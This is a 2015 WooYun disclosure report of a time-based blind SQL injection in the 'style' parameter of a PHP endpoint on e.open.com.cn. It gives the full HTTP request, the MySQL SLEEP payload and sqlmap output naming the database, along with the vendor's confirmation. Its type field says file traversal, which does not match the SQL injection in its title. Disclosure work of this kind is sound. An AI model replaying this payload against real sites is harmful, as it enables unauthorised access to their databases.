当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123412

漏洞标题:OPEN.COM.CN SQL注入

相关厂商:open.com.cn

漏洞作者: missy

提交时间:2015-06-29 14:01

修复时间:2015-08-14 10:26

公开时间:2015-08-14 10:26

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-10: 细节向核心白帽子及相关领域专家公开
2015-07-20: 细节向普通白帽子公开
2015-07-30: 细节向实习白帽子公开
2015-08-14: 细节向公众公开

简要描述:

详细说明:

注入点:
POST /popu/data.php HTTP/1.1
Host: e.open.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://e.open.com.cn/ty.html
Content-Length: 471
Cookie: b_t_s=t235545127433x; up_page_stime_100200=1435545127497; up_beacon_vist_count_100200=1; b_t_s_100200=210c51ab-6f80-4d1a-be56-489b3a50f91a; up_first_date=2015-06-29; up_beacon_id_100200=210c51ab-6f80-4d1a-be56-489b3a50f91a-1435545127499; __utma=209232844.538313747.1435545135.1435545135.1435545135.1; __utmb=209232844.7.10.1435545135; __utmc=209232844; __utmz=209232844.1435545135.1.1.utmcsr=learn.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/login.aspx; b_t_s_100100=bc9a7bd2-6e88-4cbb-8cc7-0bc057c57c28; __utma=221648972.123858968.1435545865.1435545865.1435545865.1; __utmb=221648972.1.10.1435545865; __utmc=221648972; __utmz=221648972.1435545865.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
style=%E5%B8%8C%E6%9C%9B%E5%BC%80%E9%80%9A%E4%BD%93%E9%AA%8C%E5%B8%90%E5%8F%B7&username=111111&company=111&mobile=13852147411&phone=13852147411&email=234047006%40qq.com&qq=123123123&answer=%E6%95%B0%E5%AD%97%E5%8C%96%E6%A0%A1%E5%9B%AD%E4%B8%80%E4%BD%93%E5%8C%96%E7%B3%BB%E7%BB%9F%2C%E5%A5%A5%E9%B9%8F%E8%BF%9C%E7%A8%8B%E6%95%99%E5%8A%A1%E7%B3%BB%E7%BB%9F%2C%E8%80%83%E8%AF%95%E6%B5%8B%E8%AF%84%E4%BA%A7%E5%93%81%2C%E4%BC%81%E4%B8%9A%E5%9F%B9%E8%AE%AD%E5%B9%B3%E5%8F%B0%2C


1.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: style (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: style=%E5%B8%8C%E6%9C%9B%E5%BC%80%E9%80%9A%E4%BD%93%E9%AA%8C%E5%B8%90%E5%8F%B7' AND (SELECT * FROM (SELECT(SLEEP(10)))NCBx) AND 'lBoP'='lBoP&username=111111&company=111&mobile=13852147411&phone=13852147411&email=234047006@qq.com&qq=123123123&answer=%E6%95%B0%E5%AD%97%E5%8C%96%E6%A0%A1%E5%9B%AD%E4%B8%80%E4%BD%93%E5%8C%96%E7%B3%BB%E7%BB%9F,%E5%A5%A5%E9%B9%8F%E8%BF%9C%E7%A8%8B%E6%95%99%E5%8A%A1%E7%B3%BB%E7%BB%9F,%E8%80%83%E8%AF%95%E6%B5%8B%E8%AF%84%E4%BA%A7%E5%93%81,%E4%BC%81%E4%B8%9A%E5%9F%B9%E8%AE%AD%E5%B9%B3%E5%8F%B0,
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.5
back-end DBMS: MySQL 5.0.12
current database:    'ecschool'

漏洞证明:

修复方案:

过滤相关参数

版权声明:转载请注明来源 missy@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-30 10:24

厂商回复:

要求研发人员整改

最新状态:

暂无